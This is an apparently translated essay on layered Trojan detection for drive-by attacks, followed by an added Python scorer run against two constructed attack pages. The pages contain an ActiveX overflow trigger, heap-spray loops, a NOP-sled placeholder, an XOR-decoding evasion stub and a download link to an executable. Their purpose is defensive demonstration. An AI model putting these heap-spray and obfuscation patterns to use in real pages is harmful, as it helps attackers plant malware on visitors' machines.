A Technical System for Trojan Detection from the Perspective of the Vulnerability Attack Process


Flashsky

Currently, exploiting a vulnerability to plant a Trojan (the web-based "Trojan mounting" attack) generally involves four steps:

1. Vulnerability triggering

2. Vulnerability exploitation

3. SHELLCODE execution

4. Download and execution of a virus/Trojan/backdoor

Of course, not every exploitation involves all four steps. For some logic vulnerabilities, triggering and exploiting the vulnerability are the same thing, and some attacks have no download step for a virus/Trojan/backdoor at all. For most memory-corruption vulnerabilities, however, all four steps are involved.

The technologies involved in attack research are, correspondingly:

1. Vulnerability discovery (mining) technology, to find vulnerabilities

2. Vulnerability exploitation technology, to turn a vulnerability into a working exploit

3. SHELLCODE technology and the techniques used to evade detection of it

4. Virus/Trojan technology

By contrast, Microsoft's overall protection system can be summarized as:

1. The SDL process, including source code auditing, SAL annotations and security testing, to reduce the number of vulnerabilities
2. Operating system protections such as GS (stack cookies), heap protection, SafeSEH and ASLR, to prevent exploitation or lower its reliability
3. DEP, to prevent SHELLCODE execution
4. Defender, UAC, anti-virus and anti-Trojan products, etc.


Currently, Trojan detection is generally concentrated on layers 3 and 4. By the exploitation logic above, once the attacker's SHELLCODE is executing it runs with essentially the same privileges as the detection technology and can fully counter it: detect the detector's API hooks, unhook those APIs, bypass the detection API, stop the detection engine, or locate the detection engine and terminate it. It is therefore necessary to add detection at steps 1 and 2, because at those steps the attacker's code is not yet running and cannot detect or counter the detector (unless, of course, the attacker already knows your IP address and avoids you). Moreover, many vulnerabilities exploit successfully only with some probability and depend on the target environment, so the SHELLCODE may never execute at all; such attacks can only be detected at layer 1 or 2. At present, only simple signature-based detection exists for layers 1 and 2, and such signatures are easily evaded by dynamic techniques such as obfuscation and run-time generation of the exploit. This requires Trojan detection to support:

1. Fully dynamic analysis, to keep up with such evasion

2. Detection grounded in the vulnerability mechanism itself, doing more of the work at the point where the vulnerability is triggered and exploited

so as to back up the defenses at layers 3 and 4.

Trojan detection should therefore follow the same four layers and implement multi-dimensional, multi-level detection in order to hold the advantage in the long-term contest with Trojans. Knownsec's (知道创宇) Trojan detection system is a multi-level detection system built on the above model.
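As an added illustration (not code from the original article, and not Knownsec's system), the following Python scorer applies simple static indicators at each of the four layers to two constructed drive-by pages. The page contents, the placeholder clsid, the `example.invalid` domain and the indicator regexes are all assumptions made for this example. Page A exposes every stage; page B keeps the same trigger and heap-spray code but XOR-encodes the SHELLCODE and splits the download URL, which is exactly the kind of dynamic evasion that defeats a detector working only at layers 3 and 4 while the layer 1 and 2 indicators still fire.

```python
import re

# Both pages below are CONSTRUCTED for this example (placeholder clsid, reserved
# .invalid domain, NOP bytes only); they are not captured drive-by pages.

# Page A: an unobfuscated drive-by page in which all four stages are visible.
PLAIN_PAGE = r"""
<html><body>
<object id="vuln" classid="clsid:CONSTRUCTED-FOR-EXAMPLE"></object>
<script>
var shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
var block = unescape("%u0c0c%u0c0c");
while (block.length < 0x80000) block += block;              // stage 2: grow one spray block
var spray = new Array();
for (var i = 0; i < 200; i++) spray[i] = block + shellcode; // stage 2: copy it across the heap
var buf = ""; for (var j = 0; j < 5000; j++) buf += "A";    // stage 1: oversized argument
vuln.SomeMethod(buf);
</script>
<iframe src="http://example.invalid/payload.exe"></iframe>
</body></html>
"""

# Page B: same stages 1 and 2, but the SHELLCODE is XOR-encoded and decoded at
# run time, and the download URL is assembled from fragments, so the stage 3/4
# signatures no longer match.
EVASIVE_PAGE = r"""
<html><body>
<object id="vuln" classid="clsid:CONSTRUCTED-FOR-EXAMPLE"></object>
<script>
var enc = "7c1e7c1e7c1e7c1e7c1e7c1e7c1e7c1e7c1e7c1e";   // constructed: not real shellcode
var sc = "";
for (var k = 0; k < enc.length; k += 4) sc += String.fromCharCode(parseInt(enc.substr(k, 4), 16) ^ 0xec8e);
var block = unescape("%u0c0c%u0c0c");
while (block.length < 0x80000) block += block;
var spray = []; for (var i = 0; i < 200; i++) spray[i] = block + sc;
var buf = ""; for (var j = 0; j < 5000; j++) buf += "A";
vuln.SomeMethod(buf);
var u = "http://example.invalid/pay" + "load.ex" + "e";
</script>
</body></html>
"""

# Indicators per attack stage (layer). These are deliberately simple static
# regexes: the point is which layers survive obfuscation, not signature quality.
LAYER_CHECKS = {
    1: [  # vulnerability trigger: a plugin object fed an oversized, attacker-built argument
        ("activex_object", re.compile(r'<object[^>]+classid=', re.I)),
        ("long_filler_argument",
         re.compile(r'for\s*\([^)]*<\s*\d{4,}\s*;[^)]*\)\s*\w+\s*\+=\s*"."', re.I)),
    ],
    2: [  # exploitation primitive: heap spray (grow a block, then fill the heap with copies)
        ("heap_spray_grow_loop",
         re.compile(r'while\s*\(\s*\w+\.length\s*<\s*0x[0-9a-f]{5,}\s*\)\s*\w+\s*\+=\s*\w+', re.I)),
        ("heap_spray_fill_loop",
         re.compile(r'for\s*\([^)]*<\s*\d{3,}\s*;[^)]*\)\s*\w+\[\w+\]\s*=', re.I)),
    ],
    3: [  # SHELLCODE: a static byte signature (x86 NOP sled in %u encoding)
        ("nop_sled", re.compile(r'(?:%u9090){8,}', re.I)),
    ],
    4: [  # payload download: a literal URL to an executable
        ("exe_url", re.compile(r'https?://[^\s"\'<>]+\.exe\b', re.I)),
    ],
}


def analyze(page):
    """Return {layer: [names of indicators that fired]} for one page."""
    return {layer: [name for name, rx in checks if rx.search(page)]
            for layer, checks in LAYER_CHECKS.items()}


def flagged(hits, layers):
    """True if any indicator fired in one of the given layers."""
    return any(hits[layer] for layer in layers)


if __name__ == "__main__":
    for label, page in (("plain", PLAIN_PAGE), ("evasive", EVASIVE_PAGE)):
        hits = analyze(page)
        print(label, hits)
        print("  layer 3/4 only:", flagged(hits, (3, 4)),
              " all four layers:", flagged(hits, (1, 2, 3, 4)))
```

Running it prints the per-layer hits for both pages: the layer-3/4-only verdict is True for page A and False for page B, while the four-layer verdict is True for both. A real engine would replace these regexes with emulation of the script (the "fully dynamic" requirement above), but the layering is the same.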
